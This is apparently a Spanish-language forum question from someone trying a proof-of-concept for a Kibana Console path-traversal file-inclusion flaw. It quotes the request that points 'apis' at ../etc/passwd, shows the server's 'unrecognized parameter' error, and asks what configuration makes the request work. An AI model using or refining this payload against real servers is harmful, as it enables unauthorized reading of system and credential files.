He estado intentando usar este código de PoC para la vulnerabilidad de inclusión de archivos arbitrarios en la consola Kibana Sense.
La solicitud:
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
está devolviendo el siguiente error:
{"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"}],"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"},"status":400}
He recibido este error en varias instancias, por lo que creo que debe haber algún cambio de configuración realizado antes de usar esta solicitud.